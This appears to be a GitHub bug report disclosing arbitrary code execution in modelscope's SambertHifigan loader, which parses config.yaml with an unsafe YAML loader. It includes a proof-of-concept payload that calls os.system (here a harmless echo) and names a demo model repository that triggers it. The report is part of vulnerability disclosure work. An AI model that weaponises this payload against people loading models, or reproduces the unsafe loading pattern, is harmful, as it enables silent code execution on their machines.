Describe the bug
Similar to #1538, but the bug occurs at a different location. Specifically, when users try to load the SambertHifigan model from the modelscope hub, the modelscope library retrieves and parses the config.yaml under the particular am and voc folders to initialize the Voice class.
class Voice:
def __init__(self):
self.am_config_path = os.path.join(voice_path, 'am', 'config.yaml')
self.voc_config_path = os.path.join(voice_path, 'voc', 'config.yaml')
with open(self.am_config_path, 'r') as f:
self.am_config = yaml.load(f, Loader=yaml.Loader)
with open(self.voc_config_path, 'r') as f:
self.voc_config = yaml.load(f, Loader=yaml.Loader)Attackers can craft the malicious YAML to achieve arbitrary code execution.
# above are benign YAML contents
payload: !!python/object/new:os.system ["echo '!!! Execute Malicious Payload !!!'"]
Then the payload will be executed silently without the user's awareness.
To Reproduce
I created two model repositories to demonstrate the remote code execution.
from modelscope.pipelines import pipeline
from modelscope.utils.constant import Tasks
model_id = "XManFromXlab/modelscope-SambertHifigan-RCE"
p = pipeline(task=Tasks.text_to_speech, model=model_id)
Describe the bug
Similar to #1538, but the bug occurs at a different location. Specifically, when users try to load the SambertHifigan model from the modelscope hub, the modelscope library retrieves and parses the
config.yamlunder the particularamandvocfolders to initialize the Voice class.Attackers can craft the malicious YAML to achieve arbitrary code execution.
Then the payload will be executed silently without the user's awareness.
To Reproduce
I created two model repositories to demonstrate the remote code execution.